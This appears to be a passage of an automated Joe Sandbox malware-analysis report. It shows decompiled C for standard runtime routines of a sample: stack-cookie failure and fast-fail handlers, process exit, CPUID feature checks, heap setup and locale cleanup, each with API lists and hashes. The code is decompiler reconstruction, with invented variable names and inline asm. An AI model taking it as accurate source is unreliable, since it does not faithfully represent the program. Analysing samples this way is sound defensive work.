                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 506627fa7672ecaa466b2b04dbbfc67923f2074842d08741a27fff07dc2020cc
                                                                                            • Instruction ID: 754bdca6e97cad6f1896b9b32986e84378590e6913c62d34b743cad3ff95a565
                                                                                            • Opcode Fuzzy Hash: 506627fa7672ecaa466b2b04dbbfc67923f2074842d08741a27fff07dc2020cc
                                                                                            • Instruction Fuzzy Hash: 95D06C3200010DBBDF028F84EC06EDA3FAAFB4C714F018010FA18A6020C776E861AB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 00404EC2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 78%
                                                                                            			E00404EC2(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x417094; // 0xa69f0419
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E004019E4(_t41);
					_pop(_t61);
				}
				E00401DB0(_t66,  &_v804, 0, 0x50);
				E00401DB0(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E004019E4(_t57);
				}
				return E00401C75(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}





































                                                                                            0x00404ec2
                                                                                            0x00404ec2
                                                                                            0x00404ec2
                                                                                            0x00404ecd
                                                                                            0x00404ed2
                                                                                            0x00404ed4
                                                                                            0x00404edc
                                                                                            0x00404ede
                                                                                            0x00404ee1
                                                                                            0x00404ee6
                                                                                            0x00404ee6
                                                                                            0x00404ef2
                                                                                            0x00404f05
                                                                                            0x00404f13
                                                                                            0x00404f19
                                                                                            0x00404f1f
                                                                                            0x00404f25
                                                                                            0x00404f2b
                                                                                            0x00404f31
                                                                                            0x00404f37
                                                                                            0x00404f3d
                                                                                            0x00404f43
                                                                                            0x00404f49
                                                                                            0x00404f50
                                                                                            0x00404f57
                                                                                            0x00404f5e
                                                                                            0x00404f65
                                                                                            0x00404f6c
                                                                                            0x00404f73
                                                                                            0x00404f74
                                                                                            0x00404f7d
                                                                                            0x00404f83
                                                                                            0x00404f86
                                                                                            0x00404f8c
                                                                                            0x00404f99
                                                                                            0x00404fa2
                                                                                            0x00404fab
                                                                                            0x00404fb4
                                                                                            0x00404fc2
                                                                                            0x00404fc4
                                                                                            0x00404fd9
                                                                                            0x00404fe5
                                                                                            0x00404fe8
                                                                                            0x00404fed
                                                                                            0x00404ffa

                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00401043), ref: 00404FBA
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00401043), ref: 00404FC4
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00401043), ref: 00404FD1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID: tpA
                                                                                            • API String ID: 3906539128-2187137390
                                                                                            • Opcode ID: 3371802b6f910d089bf713a7185e723a5c5ccaff7bdd45d2fa226606e2b89700
                                                                                            • Instruction ID: f928ac37146874588dc3c0f590adcea098090ec4023b56f92ea9f863e741d6b9
                                                                                            • Opcode Fuzzy Hash: 3371802b6f910d089bf713a7185e723a5c5ccaff7bdd45d2fa226606e2b89700
                                                                                            • Instruction Fuzzy Hash: 4831C674901228ABCB61DF65D989BDDBBB4BF08314F5041EAE50CA72A0E7749F85CF48
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401820 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 85%
                                                                                            			E00401820(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E004019E4(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00401DB0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00401DB0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E004019E4(_t49);
				}
				return _t49;
			}


































                                                                                            0x00401820
                                                                                            0x00401820
                                                                                            0x00401820
                                                                                            0x00401834
                                                                                            0x00401836
                                                                                            0x00401839
                                                                                            0x00401839
                                                                                            0x0040183d
                                                                                            0x00401842
                                                                                            0x0040185a
                                                                                            0x00401860
                                                                                            0x00401866
                                                                                            0x0040186c
                                                                                            0x00401872
                                                                                            0x00401878
                                                                                            0x0040187e
                                                                                            0x00401885
                                                                                            0x0040188c
                                                                                            0x00401893
                                                                                            0x0040189a
                                                                                            0x004018a1
                                                                                            0x004018a8
                                                                                            0x004018a9
                                                                                            0x004018b2
                                                                                            0x004018b8
                                                                                            0x004018bb
                                                                                            0x004018c1
                                                                                            0x004018d0
                                                                                            0x004018dc
                                                                                            0x004018e7
                                                                                            0x004018ee
                                                                                            0x004018f5
                                                                                            0x00401900
                                                                                            0x00401908
                                                                                            0x00401911
                                                                                            0x00401913
                                                                                            0x00401916
                                                                                            0x00401918
                                                                                            0x00401922
                                                                                            0x0040192a
                                                                                            0x00401930
                                                                                            0x00000000
                                                                                            0x00401937
                                                                                            0x0040193a

                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040182C
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 004018F8
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401918
                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00401922
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                            • String ID:
                                                                                            • API String ID: 254469556-0
                                                                                            • Opcode ID: 9f894133add579e2a57278a95879a39dfed86260dd6359a0065b813f1b650b97
                                                                                            • Instruction ID: 22a7e5a4722fabdcc342bf3c0c32c2da4210f6cb5de03a46523a9866377b2552
                                                                                            • Opcode Fuzzy Hash: 9f894133add579e2a57278a95879a39dfed86260dd6359a0065b813f1b650b97
                                                                                            • Instruction Fuzzy Hash: 0B311CB5D41218DBDB11DFA5D9897CDBBF8BF04304F1041AAE40DAB2A0EB755A85CF44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040441E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0040441E(int _a4) {
				void* _t14;

				if(E004087B8(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E004044A3(_t14, _a4);
				ExitProcess(_a4);
			}




                                                                                            0x0040442b
                                                                                            0x00404447
                                                                                            0x00404447
                                                                                            0x00404450
                                                                                            0x00404459

                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(?,?,0040441D,004033BF,00401056,?,004033BF,?,0040B98C), ref: 00404440
                                                                                            • TerminateProcess.KERNEL32(00000000,?,0040441D,004033BF,00401056,?,004033BF,?,0040B98C), ref: 00404447
                                                                                            • ExitProcess.KERNEL32 ref: 00404459
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 1703294689-0
                                                                                            • Opcode ID: e0fa6a4027b50d00f1b040ffecda9fc091c1c3295cc47ee8b25f05913f67d28f
                                                                                            • Instruction ID: 47b6f46ccc3c6d3b58be069537d7e23245ebedf371b1e4583baf160a64c5c687
                                                                                            • Opcode Fuzzy Hash: e0fa6a4027b50d00f1b040ffecda9fc091c1c3295cc47ee8b25f05913f67d28f
                                                                                            • Instruction Fuzzy Hash: 1DE046B1400108EBCB112F24ED08B893F69EB84349B008039FA0896271CB79ED81CA89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401A95 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 88%
                                                                                            			E00401A95(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x417984 =  *0x417984 & 0x00000000;
				 *0x417090 =  *0x417090 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0x417988; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x417988 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x417090; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x417984 = 1;
					 *0x417090 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x417984 = 2;
						 *0x417090 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x417090; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x417984 = 3;
								 *0x417090 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x417984 = 5;
									 *0x417090 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x417090 =  *0x417090 | 0x00000040;
										 *0x417984 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x417988; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x417988 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}






























                                                                                            0x00401a95
                                                                                            0x00401a98
                                                                                            0x00401aa2
                                                                                            0x00401ab3
                                                                                            0x00401c65
                                                                                            0x00401c68
                                                                                            0x00401c68
                                                                                            0x00401ab9
                                                                                            0x00401abf
                                                                                            0x00401ac4
                                                                                            0x00401ac8
                                                                                            0x00401acc
                                                                                            0x00401ace
                                                                                            0x00401ad0
                                                                                            0x00401ad3
                                                                                            0x00401ad8
                                                                                            0x00401ae1
                                                                                            0x00401af2
                                                                                            0x00401afd
                                                                                            0x00401b03
                                                                                            0x00401b04
                                                                                            0x00401b0a
                                                                                            0x00401b0d
                                                                                            0x00401b17
                                                                                            0x00401b1a
                                                                                            0x00401b1d
                                                                                            0x00401b20
                                                                                            0x00401b65
                                                                                            0x00401b65
                                                                                            0x00401b6b
                                                                                            0x00401b6b
                                                                                            0x00401b70
                                                                                            0x00401b71
                                                                                            0x00401b77
                                                                                            0x00401ba9
                                                                                            0x00401b79
                                                                                            0x00401b7b
                                                                                            0x00401b7c
                                                                                            0x00401b82
                                                                                            0x00401b85
                                                                                            0x00401b87
                                                                                            0x00401b8a
                                                                                            0x00401b8d
                                                                                            0x00401b90
                                                                                            0x00401b93
                                                                                            0x00401b9c
                                                                                            0x00401ba1
                                                                                            0x00401ba1
                                                                                            0x00401b9c
                                                                                            0x00401bac
                                                                                            0x00401bb1
                                                                                            0x00401bb4
                                                                                            0x00401bbe
                                                                                            0x00401bc9
                                                                                            0x00401bcf
                                                                                            0x00401bd2
                                                                                            0x00401bdc
                                                                                            0x00401be7
                                                                                            0x00401bf3
                                                                                            0x00401bf6
                                                                                            0x00401bf9
                                                                                            0x00401c04
                                                                                            0x00401c09
                                                                                            0x00401c0b
                                                                                            0x00401c10
                                                                                            0x00401c13
                                                                                            0x00401c1d
                                                                                            0x00401c25
                                                                                            0x00401c2a
                                                                                            0x00401c34
                                                                                            0x00401c42
                                                                                            0x00401c55
                                                                                            0x00401c5c
                                                                                            0x00401c5c
                                                                                            0x00401c42
                                                                                            0x00401c25
                                                                                            0x00401c09
                                                                                            0x00401be7
                                                                                            0x00000000
                                                                                            0x00401c64
                                                                                            0x00401b25
                                                                                            0x00401b2f
                                                                                            0x00401b54
                                                                                            0x00401b5a
                                                                                            0x00401b5d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00401AAB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: FeaturePresentProcessor
                                                                                            • String ID:
                                                                                            • API String ID: 2325560087-0
                                                                                            • Opcode ID: 10dba66e256975b7e91b45e7d636b33953ba57fe2ace31807e492e31aaf2a0cc
                                                                                            • Instruction ID: ec81c03aea5d11ea2a431551860774a0b7b2fa2f440b9197c935ece965af4293
                                                                                            • Opcode Fuzzy Hash: 10dba66e256975b7e91b45e7d636b33953ba57fe2ace31807e492e31aaf2a0cc
                                                                                            • Instruction Fuzzy Hash: FF516EB19556098BEB14CF68D8857AABBF0FB48310F14807AD405EB3A1E378E944CF58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004098BF Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004098BF() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x418328 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                                                            0x004098bf
                                                                                            0x004098c7
                                                                                            0x004098cf

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapProcess
                                                                                            • String ID:
                                                                                            • API String ID: 54951025-0
                                                                                            • Opcode ID: 568be9cc79b3b7c7766f8ec10d649c5b62d620b5abef13f777853c454147d92c
                                                                                            • Instruction ID: 69af4e497b78608f745ba415fa146c082a4a363bc9863a487731e1ea4a7910a9
                                                                                            • Opcode Fuzzy Hash: 568be9cc79b3b7c7766f8ec10d649c5b62d620b5abef13f777853c454147d92c
                                                                                            • Instruction Fuzzy Hash: 1EA00170A013058B97408F35AA497893BAAAA4DAA1B59C079B815C6161EA7584909A09
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004087B8 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004087B8(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E0040955D(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






                                                                                            0x004087c5
                                                                                            0x004087c7
                                                                                            0x004087ca
                                                                                            0x004087cd
                                                                                            0x004087d0
                                                                                            0x004087e1
                                                                                            0x004087e3
                                                                                            0x004087d2
                                                                                            0x004087d6
                                                                                            0x004087df
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004087df
                                                                                            0x004087e8

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 01323ee4a23bac34d02c5b7c5422eb59324496a561d6505e7739278363679a9f
                                                                                            • Instruction ID: d079be245e1e8a2e5275828742e162c4b15db0c6350a9ba119f5440fd825f247
                                                                                            • Opcode Fuzzy Hash: 01323ee4a23bac34d02c5b7c5422eb59324496a561d6505e7739278363679a9f
                                                                                            • Instruction Fuzzy Hash: 4EE08C72A11228EBCB15DB8DCA0498AF3FCFB49B04B6100ABF501E3281C674DE00CBD4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040908E Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0040908E(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x4178a8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00406FE2(_t46);
							E00408C1D( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00406FE2(_t47);
							E00408D1B( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00406FE2( *((intOrPtr*)(_t74 + 0x7c)));
						E00406FE2( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00406FE2( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00406FE2( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00406FE2( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00406FE2( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E004091FF( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x4171a0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00406FE2(_t31);
							E00406FE2( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00406FE2(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00406FE2(_t74);
			}















                                                                                            0x00409096
                                                                                            0x0040909a
                                                                                            0x004090a2
                                                                                            0x004090ab
                                                                                            0x004090b0
                                                                                            0x004090b7
                                                                                            0x004090bf
                                                                                            0x004090c7
                                                                                            0x004090d2
                                                                                            0x004090d8
                                                                                            0x004090d9
                                                                                            0x004090e1
                                                                                            0x004090e9
                                                                                            0x004090f4
                                                                                            0x004090fa
                                                                                            0x004090fe
                                                                                            0x00409109
                                                                                            0x0040910f
                                                                                            0x004090b0
                                                                                            0x00409110
                                                                                            0x00409118
                                                                                            0x0040912b
                                                                                            0x0040913e
                                                                                            0x0040914c
                                                                                            0x00409157
                                                                                            0x0040915c
                                                                                            0x00409165
                                                                                            0x0040916d
                                                                                            0x0040916e
                                                                                            0x00409174
                                                                                            0x00409177
                                                                                            0x0040917a
                                                                                            0x00409181
                                                                                            0x00409183
                                                                                            0x00409187
                                                                                            0x0040918f
                                                                                            0x00409196
                                                                                            0x0040919c
                                                                                            0x0040919d
                                                                                            0x0040919d
                                                                                            0x004091a4
                                                                                            0x004091a6
                                                                                            0x004091ab
                                                                                            0x004091b3
                                                                                            0x004091b8
                                                                                            0x004091b9
                                                                                            0x004091b9
                                                                                            0x004091bc
                                                                                            0x004091bf
                                                                                            0x004091c2
                                                                                            0x004091c5
                                                                                            0x004091c5
                                                                                            0x004091d5

                                                                                            APIs
                                                                                            • ___free_lconv_mon.LIBCMT ref: 004090D2
                                                                                              • Part of subcall function 00408C1D: _free.LIBCMT ref: 00408C3A
                                                                                              • Part of subcall function 00408C1D: _free.LIBCMT ref: 00408C4C
                                                                                              • Part of subcall function 00408C1D: _free.LIBCMT ref: 00408C5E
                                                                                              • Part of subcall function 00408C1D: _free.LIBCMT ref: 00408C70
                                                                                              • Part of subcall function 00408C1D: _free.LIBCMT ref: 00408C82
                                                                                              • Part of subcall function 00408C1D: _free.LIBCMT ref: 00408C94
                                                                                              • Part of subcall function 00408C1D: _free.LIBCMT ref: 00408CA6
                                                                                              • Part of subcall function 00408C1D: _free.LIBCMT ref: 00408CB8
                                                                                              • Part of subcall function 00408C1D: _free.LIBCMT ref: 00408CCA
                                                                                              • Part of subcall function 00408C1D: _free.LIBCMT ref: 00408CDC
                                                                                              • Part of subcall function 00408C1D: _free.LIBCMT ref: 00408CEE
